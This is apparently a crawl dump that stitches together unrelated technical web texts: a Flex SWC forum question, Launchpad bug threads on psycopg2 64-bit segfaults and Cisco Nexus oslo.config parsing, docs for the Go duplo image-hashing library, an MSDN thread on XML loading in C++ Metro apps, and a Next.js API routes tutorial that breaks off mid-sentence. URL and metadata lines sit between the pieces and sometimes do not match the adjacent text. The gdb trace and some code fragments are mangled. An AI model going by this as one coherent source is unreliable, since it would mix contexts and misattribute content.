https://cloudacademy.com/course/gke-role-based-access-control-1738/authorization-via-rbac/
CC-MAIN-2022-33
refinedweb
741
74.29
python-pscycopg2 segfaults on innocent operator Bug Description Binary package hint: python-psycopg2 This python program crashes immediately: import psycopg2 conn = psycopg2. cur = conn.cursor() cur.execute("SET TIME ZONE %s", ['America/ This prevents django 0.96 from working. Seems that version packaged in Ubuntu is just unusable on 64 bit architectures. When I find workaround for one segfault, psycopg2 immediately segfaults in another place. There were 64 bit fixes in the psycopg2 repository recenty, probably they should be applied to Ubuntu package source immediately. I think many widely used packages depend on psycopg2 (django, pylons and zope are most prominent examples). Please, fix the problem. Meanwhile, I'll try to compile newest version from svn. I've experienced the same issue with one of our recently upgraded systems. The fix I applied was to apt-get remove python-psycopg2 and compile psycopg2- It appears this patch: http:// is the most important one (Bug 167 at psycopg's site). Cheers. It seems that psycopg2 is more stable under Python 2.4, but may still have some problems. The patch on that bug report does not appear to be the only size_t related change though: it is probably worth checking up on what else is in the 2.0.6 release. Upstream pre-release 2.0.6b2 package available for feisty at http:// Apparently the 2.0.6 release is mostly bug fixes, maybe this version can be uploaded to feisty-updates? Problem confirmed with feisty, amd64, python 2.5, and python-psycopg 2.05: segmentation fault, using Django, traced to psycopg with gdb. Using the released version of psycopg 2.06, built from source, solves the problem. Sorry, this is a bit off-topic, but: I've found two serious bugs in Ubuntu related to x86-64 platform. Neither was fixed at all. This is really discouraging. I think this Psycopg bug affects many people and they will badmouth Ubuntu or stop using it. And the fix is available upstream. Why not release an update?... Just don't understand it. Another bug I've found was in previous release of ubuntu: popular IMAP server dovecot was loosing letters on x86-64 -- it was discussed and affirmed several times on dovecot mailing list, but the patch wasn't applied to the previous Ubuntu release... that's why I moved to debian unstable :) Can we get the package uploaded to Gutsy backported into feisty please? This fixes a completely broken package for feisty amd64. Many python frameworks depend on psycopg2. Any help is appreciated. Thanks, Don Spaulding Note that the 2.0.5 release of psycopg2 has other serious problems, such as not reporting errors from commit(). So if an update is going to be made available for previous versions of Ubuntu, it would be better to backport the latest version rather than trying to backport just the 64-bit fix. Backports team is not authorized to perform backports for the purpose of bugfixing. This is a very serious issue for me... Psycopg2 2.0.5 is completely broken on amd64. No chance for a fix? I guess no. This is not a first issue of such kind that is not ever fixed. I'm currently making updates for such packages myself. Probably I should start an unofficial updates repository for Ubuntu. Or return to Debian. ׂGood thing it's easy to compile. I trust this is not an issue in LTS versions? On 9/16/07, Ruben Fonseca <email address hidden> wrote: > > > -- > python-pscycopg2 segfaults on innocent operator > https:/ > You received this bug notification because you are a direct subscriber > of the bug. > -- Man is the only animal that laughs and weeps, for he is the only animal that is struck with the difference between what things are and what they ought to be. - William Hazlitt Ohad Lutzky > Good thing it's easy to compile. I trust this is not an issue in LTS versions? There's at least a problem with dovecot IMAP server in the LTS version. It contains off-by-one bug or something similar that causes hangs when you save messages via IMAP (by moving email from one folder to another, for example, or when your IMAP client saves sent message on the server). The bug was closed as invalid because: "Thanks taking the time to report this bug and helping to make Ubuntu better. However, I am closing it because the bug has been fixed in the latest development version of Ubuntu - the Gutsy Gibbon (and also Feisty as you suggested)." It seems that Ubuntu maintainers don't care about anything. I've posted the patch from the dovecot mailing list, they only had to apply it and put a new package in updates. What does it mean? I cannot understand. :( Bugs shouldn't be fixed in Ubuntu? Maintainers are too busy? Noone uses PostgreSQL from Python and dovecot IMAP/POP server? I must do something so that they pay attention to my bugs (make a donation or something)? Maybe I'm crazy and do not understand something about bugs, bug reports and updates? This is a very bad bug and really needs to be fixed. The package is completely useless on 64bit machines. Is there any possibility this will ever be fixed so I don't have to build my own version of this? > The patch on that bug report does not appear to be the only size_t related change though: > it is probably worth checking up on what else is in the 2.0.6 release. did somebody start this? Oh, just a year passed and someone noticed that there's totally broken package. And even patch exists. LOL :) Sorry, couldn't resist. You can remove my message. Matthias: I believe that the 2.0.6 release fixes the 64-bit compatibility problem this bug was about, so the bug can probably be closed. It'd be nice if we had 2.0.7 for Hardy, but I haven't managed to get Federico to make the release yet :( Sorry, I misread this bug. I believe it is still an issue on Feisty. A backport or update to 2.0.6 is still needed to fix this bug in that release. Please could someone mark this as Won't Fix for Feisty? Ubuntu Feisty Fawn is no longer supported, so a SRU will not be issued for this release. Marking Feisty as Won't Fix. GDB stacktrace: (gdb) run /tmp/crash.py Starting program: /usr/bin/python /tmp/crash.py [Thread debugging using libthread_db enabled] [New Thread 47324899014384 (LWP 4070)] Program received signal SIGSEGV, Segmentation fault. 0000) abstract. c:1893 abstract. c: No such file or directory. abstract. c 0000) abstract. c:1893 0x2b0ab0371e95 "getquoted", format=0x0) at ../Objects/ abstract. c:1968 getquoted (obj=<value optimized out>, 0x2b0aafef2118) at psycopg/ microprotocols. c:142 18d0, 2118, new=0x7ffffbc04cd8) cursor_ type.c: 203 1f4e0, 0x2b0aaef3c570, vars=0x2b0aaeef 18d0, async=0) cursor_ type.c: 300 1f4e0, cursor_ type.c: 427 <value optimized out>) at ../Python/ ceval.c: 3564 ceval.c: 2831 0x7cc120, locals= 0x2b0ab034d170) at ../Python/ ceval.c: 494 0x7ffffbc0594a "/tmp/crash.py", start=<value optimized out>, 0x778410, locals=0x778410, closeit=1, flags=0x7ffffbc 051d0) pythonrun. c:1271 eExFlags (fp=0x755010, 0x7ffffbc0594a "/tmp/crash.py", closeit=1, flags=0x7ffffbc 051d0) pythonrun. c:877 0x7ffffbc052f8) at ../Modules/ main.c: 523 [Switching to Thread 47324899014384 (LWP 4070)] call_function_tail (callable=<value optimized out>, args=0x2b0a0000 at ../Objects/ 1893 ../Objects/ in ../Objects/ (gdb) bt #0 call_function_tail (callable=<value optimized out>, args=0x2b0a0000 at ../Objects/ #1 0x0000000000419a10 in PyObject_CallMethod (o=<value optimized out>, name= #2 0x00002b0ab036a7e3 in microprotocol_ conn= #3 0x00002b0ab036c29b in _mogrify (var=0x2b0aaeef fmt=<value optimized out>, conn=0x2b0aafef at psycopg/ #4 0x00002b0ab036cfa8 in _psyco_curs_execute (self=0x2b0ab03 operation= at psycopg/ #5 0x00002b0ab036d7ff in psyco_curs_execute (self=0x2b0ab03 args=<value optimized out>, kwargs=<value optimized out>) at psycopg/ #6 0x000000000048875d in PyEval_EvalFrameEx (f=0x7b96a0, throwflag= #7 0x000000000048973a in PyEval_EvalCodeEx (co=0x2b0aaef2c4e0, globals=<value optimized out>, locals=<value optimized out>, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ #8 0x0000000000489782 in PyEval_EvalCode (co=0x2b0aafcb2960, globals= #9 0x00000000004aae7e in PyRun_FileExFlags (fp=0x755010, filename= globals= at ../Python/ #10 0x00000000004ab110 in PyRun_SimpleFil filename= at ../Python/ #11 0x00000000004146b5 in Py_Main (argc=<value optimized out>, argv= #12 0x00002b0aaf9838e4 in __libc_start_main () from /lib/libc.so.6 #13 0x0000000000413bf9 in _start ()
https://bugs.launchpad.net/ubuntu/+source/psycopg2/+bug/108067
CC-MAIN-2016-18
refinedweb
1,389
68.26
README ¶ Duplo - Detect Similar or Duplicate Images This Go library allows you to perform a visual query on a set of images, returning the results in the order of similarity. This allows you to effectively detect duplicates with minor modifications (e.g. some colour correction or watermarks). It is an implementation of Fast Multiresolution Image Querying by Jacobs et al. which uses truncated Haar wavelet transforms to create visual hashes of the images. The same method has previously been used in the imgSeek software and the retrievr website. Installation go get github.com/rivo/duplo Usage import "github.com/rivo/duplo" // Create an empty store. store := duplo.New() // Add image "img" to the store. hash, _ := duplo.CreateHash(img) store.Add("myimage", hash) // Query the store based on image "query". hash, _ = duplo.CreateHash(query) matches := store.Query(hash) sort.Sort(matches) // matches[0] is the best match. Documentation Possible Applications - Identify copyright violations - Save disk space by detecting and removing duplicate images Projects Using This Package More Information For more information, please go to or get in touch. Documentation ¶ Overview ¶ Package duplo provides tools to efficiently query large sets of images for visual duplicates. The technique is based on the paper "Fast Multiresolution Image Querying" by Charles E. Jacobs, Adam Finkelstein, and David H. Salesin, with a few modifications and additions, such as the addition of a width to height ratio, the dHash metric by Dr. Neal Krawetz as well as some histogram-based metrics. Quering the data structure will return a list of potential matches, sorted by the score described in the main paper. The user can make searching for duplicates stricter, however, by filtering based on the additional metrics. Example ¶ Package example. // Create some example JPEG images. addA, _ := jpeg.Decode(base64.NewDecoder(base64.StdEncoding, strings.NewReader(imgA))) addB, _ := jpeg.Decode(base64.NewDecoder(base64.StdEncoding, strings.NewReader(imgB))) query, _ := jpeg.Decode(base64.NewDecoder(base64.StdEncoding, strings.NewReader(imgC))) // Create the store. store := New() // Turn two images into hashes and add them to the store. hashA, _ := CreateHash(addA) hashB, _ := CreateHash(addB) store.Add("imgA", hashA) store.Add("imgB", hashB) // Query the store for our third image (which is most similar to "imgA"). queryHash, _ := CreateHash(query) matches := store.Query(queryHash) fmt.Println(matches[0].ID) Output: imgA Index ¶ - Constants - Variables - type Hash - - type Match - - type Matches - - type Store - - func (store *Store) Add(id interface{}, hash Hash) - func (store *Store) Delete(id interface{}) - func (store *Store) Exchange(oldID, newID interface{}) error - func (store *Store) GobDecode(from []byte) error - func (store *Store) GobEncode() ([]byte, error) - func (store *Store) Has(id interface{}) bool - func (store *Store) IDs() (ids []interface{}) - func (store *Store) Modified() bool - func (store *Store) Query(hash Hash) Matches - func (store *Store) Size() int Examples ¶ Constants ¶ const ( // ImageScale is the width and height to which images are resized before they // are being processed. ImageScale = 128 ) Variables ¶ var ( // TopCoefs is the number of top coefficients (per colour channel), ordered // by absolute value, that will be kept. Coefficients that rank lower will // be discarded. Change this only once when the package is initialized. TopCoefs = 40 ) Functions ¶ This section is empty. Types ¶ type Hash ¶ type Hash struct { haar.Matrix // Thresholds contains the coefficient threholds. If you discard all // coefficients with abs(coef) < threshold, you end up with TopCoefs // coefficients. Thresholds haar.Coef // Ratio is image width / image height or 0 if height is 0. Ratio float64 // DHash is a 128 bit vector where each bit value depends on the monotonicity // of two adjacent pixels. The first 64 bits are based on a 8x8 version of // the Y colour channel. The other two 32 bits are each based on a 8x4 version // of the Cb, and Cr colour channel, respectively. DHash [2]uint64 // Histogram is histogram quantized into 64 bits (32 for Y and 16 each for // Cb and Cr). A bit is set to 1 if the intensity's occurence count is large // than the median (for that colour channel) and set to 0 otherwise. Histogram uint64 // HistoMax is the maximum value of the histogram (for each channel Y, Cb, // and Cr). HistoMax [3]float32 } Hash represents the visual hash of an image. type Match ¶ type Match struct { // The ID of the matched image, as specified in the pool.Add() function. ID interface{} // The score calculated during the similarity query. The lower, the better // the match. Score float64 // The absolute difference between the two image ratios' log values. RatioDiff float64 // The hamming distance between the two dHash bit vectors. DHashDistance int // The hamming distance between the two histogram bit vectors. HistogramDistance int } Match represents an image matched by a similarity query. type Matches ¶ Matches is a slice of match results. type Store ¶ Store is a data structure that holds references to images. It holds visual hashes and references to the images but the images themselves are not held in the data structure. A general limit to the store is that it can hold no more than 4,294,967,295 images. This is to save RAM space but may be easy to extend by modifying its data structures to hold uint64 indices instead of uint32 indices. Store's methods are concurrency safe. Store implements the GobDecoder and GobEncoder interfaces. func (*Store) Add ¶ Add adds an image (via its hash) to the store. The provided ID is the value that will be returned as the result of a similarity query. If an ID is already in the store, it is not added again. func (*Store) Delete ¶ Delete removes an image from the store so it will not be returned during a query anymore. Note that the candidate slot still remains occupied but its index will be removed from all index lists. This also means that Size() will not decrease. This is an expensive operation. If the provided ID could not be found, nothing happens. func (*Store) Exchange ¶ Exchange exchanges the ID of an image for a new one. If the old ID could not be found, nothing happens. If the new ID already existed prior to the exchange, an error is returned. func (*Store) GobDecode ¶ GobDecode reconstructs the store from a binary representation. You may need to register any types that you put into the store in order for them to be decoded successfully. Example: gob.Register(YourType{}) func (*Store) GobEncode ¶ GobEncode places a binary representation of the store in a byte slice. func (*Store) Has ¶ Has checks if an image (via its ID) is already contained in the store. func (*Store) IDs ¶ IDs returns a list of IDs of all images contained in the store. This list is created during the call so it may be modified without affecting the store. func (*Store) Modified ¶ Modified indicates whether this store has been modified since it was loaded or created. func (*Store) Query ¶ Query performs a similarity search on the given image hash and returns all potential matches. The returned slice will not be sorted but implements sort.Interface, which will sort it so the match with the best score is its first element.
https://pkg.go.dev/github.com/rivo/duplo?utm_source=godoc
CC-MAIN-2022-40
refinedweb
1,174
58.38
Asked by: How to read an XML file using DOM API's in a Windows Metro App in C++. General discussion Hi How can I read an XML file using DOM API's in a Windows metro app, I'm using C++ and couldn't find any sample in the same. Monday, July 9, 2012 11:54 AM - Changed type Steve HorneMicrosoft employee, Moderator Monday, July 9, 2012 8:30 PM All replies - Did you look at the Windows::Data::Xml::Dom namespace?Monday, July 9, 2012 4:32 PM Hi Yashpal, Please have a look WinRT class's available for XML file handling. MSDN - There are many class's and interfaces available like XmlDocument, etc Hope this helps you to handle an XML file from Metro App. Thanks, BhashMonday, July 9, 2012 5:04 PM thanks BhashTech & Sridhar, I don't have any problem with the DOM, the main thing is the inclusion of Asynchronous programming in WinRT API's, I find it a bit confusing, also there is no sample available at MSDN using C++. I want to create some metro style app that will read and process a local XML file. Any example would be helpful. thanks in advance.Monday, July 9, 2012 6:09 PM void FileIo::getXML( ) { using namespace Windows::Storage; using namespace concurrency; typedef Windows::Storage::StorageFile^ PickSingleFileType; typedef Windows::Data::Xml::Dom::XmlDocument ^ LoadFromFileRetType; auto picker= ref new Windows::Storage::Pickers::FileOpenPicker(); picker->FileTypeFilter->Append(".xml"); // Required task< PickSingleFileType > getFileTask ( picker->PickSingleFileAsync() ); getFileTask.then([]( PickSingleFileType xmlFile ) { if ( xmlFile != nullptr) { auto doc= ref new Windows::Data::Xml::Dom::XmlDocument(); task< LoadFromFileRetType > getDocTask ( doc->LoadFromFileAsync( xmlFile ) ); getDocTask.then([ doc ]( LoadFromFileRetType xmlDoc ) { // Now go process the XML file as you like Platform::String ^ nodeName= doc->NodeName; }); } }); }My attempt is above. I also did a #include <ppltasks.h> I am uncertain if this is the best way, but at least it is something to look at.Monday, July 9, 2012 8:49 PM Thanks @Andrew. It really helped a lot. Additionally, can it be designed in a way that I can get the loaded XmlDocument instead of void. I am talking about some function that will have a signature like Windows::Data::Xml::Dom::XmlDocument LoadDocFromFile (Platform::String^ folder, Platform::String^ file); (where folder/file is the path to the XML file to be loaded) using the concepts of asynchronous programming i.e. using task, task::then. regards.Tuesday, July 10, 2012 4:03 AM Hi Yashpal, See Andrew's post below explaining how to use PPL Tasks to load the XML file and get access to the DOM. In order to get access to the DOM, have it as a member variable and capture that in the lambda scope. that way once you return from the nested tasks, you are good to go. Take a look at which shows a very simple example of using tasks. In the example at the site, the "this" pointer is captured in the lambda scope and thus member variables can be referenced inside the lambda. Hope this helps.Tuesday, July 10, 2012 2:32 PM The following code is my attempt to PASS IN a lambda that is called when the XMLDocument is ready. I used std::function, and there are other ways too. I'm still not too familiar with the syntax yet. I am wary of an attempt to return an XMLDocument because I don't understand how it is possible to delay the return of getXML() until the XML document is ready. The idea behind the concurrency::task and the .then is to arrange for future execution that does not hold up this thread after all. Perhaps a PPL expert can comment? void FileIo::getXML( std::function< void ( Windows::Data::Xml::Dom::XmlDocument ^ passedDoc ) > myXmlDocHandler ) { using namespace Windows::Storage; using namespace Windows::Storage::Pickers; using namespace Windows::Data::Xml::Dom; using namespace concurrency; auto picker= ref new FileOpenPicker(); picker->FileTypeFilter->Append(".xml"); // Required task< StorageFile^ > getFileTask ( picker->PickSingleFileAsync() ); getFileTask.then([ myXmlDocHandler ]( StorageFile^ xmlFile ) { if ( xmlFile != nullptr) { auto doc= ref new XmlDocument(); task< XmlDocument ^ > getDocTask ( doc->LoadFromFileAsync( xmlFile ) ); getDocTask.then( [ myXmlDocHandler ] ( XmlDocument^ doc ) { myXmlDocHandler( doc ); }); } }); } //-------------------------------------- // Calling mechanism auto lambda = []( Windows::Data::Xml::Dom::XmlDocument ^ xmlDoc ) { // Now go process the XML file as you like Platform::String ^ nodeName= xmlDoc->NodeName; }; FileIo::getXML( lambda ); Error handling could perhaps be delegated to another std::function object. @Sridhar, the technique of using a member variable that can be captured by the Lambda would also work, but I think Yashpal is thinking in terms of a library routine not dependent on a particular class's member variable. Tuesday, July 10, 2012 2:34 PM - Edited by Andrew7Webb Tuesday, July 10, 2012 9:45 PM code written @Andrew: ah, I get it. @Yashpal: Artur has a great post explaining about PPL tasks at. Some of the examples he illustrates talk about returning values from PPL tasks and lambdas.Friday, July 13, 2012 6:40 AM @Sridhar I tried to navigate to the mentioned link, but it shows following error. regards, Yashpal/magazine/hh781020.aspx. Friday, August 10, 2012 6:46 AM Here are some useful links for folks on this thread: 1. Perils of lambda capture with PPL tasks: 2. Asynchronous Programming in C++ Using PPL 3. Here is a video on Windows 8 async programming using C++: 4. Here is good blog on the general async philosophy on Windows 8: 5. Here is the official msdn documentation: Rahul V. PatilFriday, August 10, 2012 6:22 PM
https://social.msdn.microsoft.com/Forums/en-US/66df8021-6f3e-429c-83b8-392ddc737194/how-to-read-an-xml-file-using-dom-apis-in-a-windows-metro-app-in-c?forum=winappswithnativecode
CC-MAIN-2022-27
refinedweb
913
55.34
Hi. I have made a custom component in flash and converted it to a flex component. The component loads and works in the mxml file. However what I really want is to use the SWC in an actionscript class file. I am having a little trouble doing this. When I import the SWC what I find is the SWC name followed by "_fla" (someComponent_fla). This seems to be the SWC since I can see the instances used in the component. The question I have is? How do I get a instance of this component. The example code shown below does not work. import SomeComponent_fla; .... var someComponent:SomeComponent_fla = new SomeComponent_fla(); .... Please, where am i going wrong?
http://forums.adobe.com/thread/1300673
CC-MAIN-2014-15
refinedweb
115
69.38
So I'm still chugging along with learning how to code in Ruby and I've come across something new that I'm curious about. My teacher just started teaching us about methods and I was wondering if you could call/create a method based on an if-else statement. Like for example if you had a program that asked the user to type in someone's name could you then use that input to decide which method would be used? example: puts "Please enter name(Brian, Andy, Tod)" string = gets.to_i if string == "Brian" def b(string) puts "Hi Brian" return b elsif string == "Andy" def a(string) puts "Hi Andy" return a elsif string == "Tod" def t(string) puts "Hi Tod" return t else puts "Not a valid entry" end Yeah, the normal way to do this is to define the methods beforehand then invoke them from the (elsif) conditional: def b puts "Hello brian" end def a puts "Hello andy" end def t puts "Hello tod" end puts "Please enter name(Brian, Andy, Tod)" string = gets.chomp if string == "Brian" b elsif string == "Andy" a elsif string == "Tod" t else puts "Not a valid entry" end when you say a by itself that's the same as saying a() - invoking the method. You could technically define the methods inside the conditional (before invoking them) but this isn't good style and is rarely done. Some other points - stringparameter so you can remove it, like I've done gets.to_iis saying "get input and convert it to integer" - not what you want to do here. What you're looking for is gets.chomp, which gets a line of input and removes the \nnewline character from the end (all getsinput will have a newline character at the end) Note this conditional chain seems like a good candidate for case, and you can refactor the puts into a single place - def b "Hello brian" end def a "Hello andy" end def t "Hello tod" end input = gets.chomp puts case input when "Brian" then b when "Andy" then a when "Tod" then t else "not a valid entry" end or you could use a hash structure instead of methods puts { "Brian" => "Hello brian", "Andy" => "Hello andy", "Tod" => "Hello tod" }.fetch(gets.chomp, "Invalid input")
https://codedump.io/share/JRnYZII9nEan/1/ruby-calling-a-method-based-on-an-elseif-statement
CC-MAIN-2017-09
refinedweb
384
68.64
Nexus_Switch config parsing incompatible with newer oslo.config versions Bug Description quantum/ for parsed_file in cfg.CONF. for parsed_item in parsed_file.keys(): if nexus_name == 'NEXUS_SWITCH': Recently, _cparser has been renamed/removed as the implementation in oslo.config was changed by Mark. since then this code fails. Is there a public API for iterating over all found groups in configs? I was only able to find a way to iterate over pre-registered config groups, which does not work here (as the code does not know the exact config group name yet. The code is designed to look for all groups in the form of [NEXUS_ I think it's pretty clear Quantum should never have used this internal API, so marking as Invalid in oslo Look at the way register_ Basically, the only reason you want to parse these files directly is to get the list of [NEXUS_SWITCH:<ip>] sections Once you've got the list of IPs, you can do e.g. nexus_opts = [ cfg. ... ] def _read_nexus_ group_name = 'nexus_switch:' + ip for key, value in conf[group_ def _read_nexus_ multi_parser = cfg.MultiConfig read_ok = multi_parser. if len(read_ok) != len(conf. raise cfg.Error("Some config files were not parsed properly") nexus_dict = {} for parsed_file in multi_parser. for section in parsed_file.keys(): if not section. ip = section.split(':', 1)[1] Thanks for the explanation! I'll work on it. Dirk and Mark, thanks for triaging this and finding the bug in the Nexus plugin here. If there's anything else you guys need from us on the Cisco side, let me know. We can test out your fix with actual Nexus hardware if you want, for example. That would be great. I'll ping you once the review is online in gerrit. Dirk - any update? We really could do with this backported to stable/grizzly Dirk, if you are swamped, we at Cisco are happy to take this over and fix it. Please let us know ASAP. I was literally just working on it when I got interrupted by debugging another issue. I'll post a patch by tomorrow morning. This changeset seems to work for me (tested with a small test wrapper): https:/ Reviewed: https:/ Committed: http:// Submitter: Jenkins Branch: master commit f8e3a5e5877f609 Author: Dirk Mueller <email address hidden> Date: Mon Jun 24 20:56:32 2013 +0200 Be compatible with oslo.config 1.2.0a3+ The private API of oslo.config changed, and the Cisco options parsing code was using it. Use an explicit MultiConfigParser instance for parsing the config files. Fixes LP Bug #1196084 Change-Id: I7ffcac3c295491 This code doesn't exist in grizzly, so marking as invalid there. there is however similar code in the Nicira plugin. I'll file a separate bugreport for this. This was caused by commit f083d7cfcbc2227 20fd479a1dabe08 d7ae7ed044: Author: Mark McLoughlin <email address hidden> Date: Fri May 17 00:31:22 2013 +0100 Parse config files in an argparse callback Part of fixing bug #1176817 where self._cparser was renamed to self._namespace: - self._cparser = None self. _cli_values = {} + self._namespace = None Mark, could you explain why the bug was marked as incomplete?
https://bugs.launchpad.net/neutron/+bug/1196084
CC-MAIN-2021-04
refinedweb
517
66.84
13 August 2009 07:07 [Source: ICIS news] By Jeremiah Chan SINGAPORE (ICIS news)--Bisphenol A (BPA) spot prices in Asia soared by around 60% in just over five months, boosted by high costs of feedstocks propylene and benzene, market sources said on Thursday. Producers continued to hike prices to protect their margins despite languid demand, they said. Offers from BPA producers in Taiwan, Japan and South Korea to China, a key market for the chemical, jumped to as high as $1,350/tonne (€945/tonne) CFR (cost and freight) northeast (NE) Asia this week from $810-850/tonne CFR NE Asia in early March 2009. Over the same period, benzene more than doubled its value while propylene prices jumped by more than 50%, according to global chemical intelligence service ICIS pricing. On Thursday, benzene was quoted at around $835/tonne FOB (free on board) Korea while propylene traded at around $1,050-1,150 CFR China. BPA fixtures were largely settled at $1,250-1,300/tonne CFR NE Asia in the week that ended 7 August, up $40-60/tonne week on week, based on ICIS pricing data. “While we are happy that prices are going up, it (the rise) is not enough yet,” said the marketing manager of a major Korean producer. “The spread between BPA and benzene should be at least $450/tonne in order [for us] to break-even and we are targeting $500/tonne for some margins,” said the marketing manager. Tight supply may also be playing a part in the continued uptrend of BPA prices as some sellers in Europe and the ?xml:namespace> Delays in restarting the 120,000 tonne/year BPA plant of Shanghai Sinopec Mitsui Chemicals (SSMC) further limited supply. The plant's restart was pushed back to mid August from late June. Market sources said technical problems may have cropped up, the same problem that caused the plant to run sporadically when it was started up late last year. Downstream demand from epoxy resin manufacturers, however, remained tepid due to squeezed production margins and poor buying interest for finished products, market sources said. “We have to increase our final product prices but there is extremely high resistance from our buyers,” the purchasing manager of an epoxy resins plant in eastern If this trend continues, epoxy resin plants may have to further cut production, he said, adding that most plants in BPA buying activities in recent weeks maybe the work of speculative traders taking positions amid the price upturn, while actual downstream end-users were only procuring small volumes as and when they need cargoes, market sources said. Major BPA producers in ($1 = €0.70) Ong Sheau Ling, Steve Tan and Bohan Loh contributed to this story.
http://www.icis.com/Articles/2009/08/13/9239538/strong-feedstock-costs-underpin-asia-bpas-60-price-spike.html
CC-MAIN-2013-20
refinedweb
457
61.09
— March 4, 2021 Use the API routes feature in Next.js to build extensible serverless lambda functions, and learn about the basic steps of productive API design and development. Read this story on Medium. Next.js is a framework for React that makes developing SEO-friendly sites easy and effective for developers. Because it is loaded great features and has amazing documentation (along with an introductory course), Next.js is a great choice for developers of any experience level. To most developers who have heard of Next.js, what comes to mind when it is mentioned is "front-end web development." However, many may not be aware of its API routes feature, which enables you to write your front-end and back-end code within the same codebase. When combined with a serverless platform like Vercel (which was developed specifically for Next.js) or Netlify, the API routes feature of Next.js gives developers the power to easily write lambda functions for their project's API. In this tutorial, we will make use of this innovative feature to create a basic example of a real-world API. We will walk through the basic steps of productive API design and development, including topics such as logic abstraction, top-down design, and skeleton code. Once we have completed the API and you are interesting in going above-and-beyond, read the bonus "Integration testing" section and/or optional "Create a landing page" and "Deploy to Vercel" sections. For this project, we will create a basic API that lets its end users randomly generate phrases based on a given query; think of it like a computer filling in the blanks for a MadLibs game. Let's look at some examples of queries and possible responses: the $animal jumped over the $nounmight respond with the cow jumped over the moonor the cat jumped over the river. I like $gerund $pluralNounmight respond with I like dancing carsor I like bubbling buildings. my $bodyPart is $adjectivemight respond with my tonsil is arrogantor my forearm is dumb. As you can see from these examples, the word type preceded by the $ character informs the API to replace it with a word. The word that it will replace it with is randomly generated from a list of words that the API will access. Before we get started coding the project, let's plan out how the API will work, and then how we plan on organizing our code Next.js API routes adhere by the REST (representational state transfer) protocol, a standardized protocol used by the majority of internet APIs. As such, we have a great amount of flexibility for designing the routes of the API. This API will accept two routes: one route will accept a slug, whereas another route will accept a JSON object with a query property., the slug would be this-is-the-post. For this API, the URL will look something like this:[slug], where [slug]is replaced with the desired query. Because the URL of this route will change depending on the request, it is called a dynamic route. This API route will be performed by sending a GETrequest to the server with the desired query URL. { "query": QUERY }, where QUERYis the desired format. This API route will not be performed simply by changing the URL; it must be performed through a POSTrequest to the server, with the body of the request being the object with the described format. All of these routes will be written as lambda functions, with the functions accepting a req request parameter (for interacting with the user's request) and a res response parameter (for interacting with the response data to send back to the user). In computer science theory terms, a lambda function is any function that is not bound to an identifier, also known as being anonymous. The theory behind lambda functions comes from the field of lambda calculus, and in essence they allow functions to be passed as parameters to other functions. In terms of serverless computing, the phrase "lambda function" was popularized by the AWS Lambda service which allows you to write "functions" that act as API endpoints (similar to what we will be doing with Next.js API routes). Like the definition in terms of computer science theory, these serverless lambda functions are not bound to any server and are given to the serverless service to call when that API endpoint is reached (hence matching the functions-passed-as-parameters quality of computer science theory lambda functions). The most basic structure of a Next.js project is as follows: 1 2 3 - pages - index.js - package.json The pages/index.js file represents the index location of your website's router. If you had a /about page, this would correspond to the pages/about.js file, etc. For this project, we will be using Typescript, so instead of .js, we will use .tsx. Additionally, because we are writing API routes, they must be located in the pages/api directory. 1 2 3 4 5 - pages - api - index.tsx - [slug].tsx - package.json The two files in the api directory will be the two API routes that were previously described: index.tsx will be used for the request body route, and [slug].tsx will be used for the slug route. [slug].tsx must be wrapped in brackets [] to tell Next.js that this is a dynamic route. As always, the code for this project is available on Github:. If you are interested in seeing the final product, visit. You can test the API routes on this URL. To start, we can create a basic Next.js project. To do so, run: 1 2 3 npx create-next-app # or yarn create next-app This will run the create-next-app CLI and will prompt you for your project name. I will call it words-aas for the sake of this tutorial. Because this project will be using Typescript, we will need to install the typescript dependency, along with the typings dependencies for react, react-dom, and node. These dependencies are only used for development, so we will add them to devDependencies with the -D flag. 1 yarn add -D typescript @types/react @types/react-dom @types/node This file will contain all the logic for the API. Since we will have multiple API routes that share the same logic, it makes sense for us to adhere to the DRY (do not repeat yourself) principle and to abstract the logic into a single file that can be imported later on. That way, we can put all the complexities of the API logic away from the actual API routes which will make development much more efficient. Depending on the structure of your project, you can create/use a lib directory as opposed to a util directory. Before we write the API logic, we can create the two skeleton API routes. Next.js houses API routes in the pages/api folder, so we will create the following two files: pages/api/[slug].ts— the slug API route. Wrapping slugin brackets will tell Next.js that this is a dynamic route, and the slug will be passed to the lambda function. pages/api/index.ts— the query API route. This route accepts a JSON object, so there is no need to make it a dynamic route. Inside both of these files, we will create a basic API route: 1 2 3 4 5 import { NextApiRequest, NextApiResponse } from "next"; export default async (req: NextApiRequest, res: NextApiResponse) => { res.send("Hello world!"); }; To test these API routes, run yarn dev or simply next in your project. Then, visit in the browser and/or[slug] ( [slug] can be any string). You should be greeted with Hello, world! as a response. The slug API route will take a slug string and transform it into a phrase. As previously mentioned, the slug will consist of a list of word types joined by a comma ,. Because the slug API route is a dynamic route, the slug will be passed to us in the req.query object. We will need to explicitly tell Typescript that the req.query object contains a slug property, so we can use a type annotation ( as { slug: string }) to fix this issue. 1 2 3 4 5 6 7 import { NextApiRequest, NextApiResponse } from "next"; export default async (req: NextApiRequest, res: NextApiResponse) => { const { slug } = req.query as { slug: string }; res.send(slug); }; To test this route, visit $pluralNoun is $gerund in the browser, and the slug you entered should be the response you are given. The request body API route provides a lot more customizability to the desired phrase than the slug API route. As such, we will need to manipulate the provided query string to transform it into an array of word types, as we did for the slug API route. Because this API route accepts a JSON object, we will use the req.body object as opposed to the req.query object. We will also explicitly tell Typescript that the req.body object contains a query property. 1 2 3 4 5 6 7 import { NextApiRequest, NextApiResponse } from "next"; export default async (req: NextApiRequest, res: NextApiResponse) => { const { query } = req.body as { query: string }; res.send(slug); } To test this route, you can open a REST Client like Insomnia or Postman and test sending a JSON object with the query property to. To learn more about testing these routes, scroll down to the bonus "Integration Testing" section. Here comes the fun part! Now that have phrases split up into individual words/word types within the skeleton API routes, we can open the util/api.ts file to code the API logic. To create the API logic, we will follow the top-down design practice in which we break down the total API logic (the system) into individual functions (called sub-systems). Using this practice, we can put all the individual subsystems together as we complete the system, which allows us to be much more efficient than starting from the bottom-up. The following functions will live in the util/api.ts file. The getWordFile function accepts a wordType: string parameter, and returns a list of words that match the given word type. 1 2 3 4 5 6 7 const getWordFile = async (wordType: string) => await ( await fetch( (process.env.NODE_ENV === "production" ? "" : "") + wordType, ) ).text(); This function fetches the file for the given word type. If you are a savvy full-stack developer, you may notice that we are actually using fetch on the server-side, and you may wonder, isn't fetch only supported on the browser-side? Yes, the fetch api is only natively supported in browsers, but Next.js provides a polyfill for the fetch api so we can use it on the backend! The word 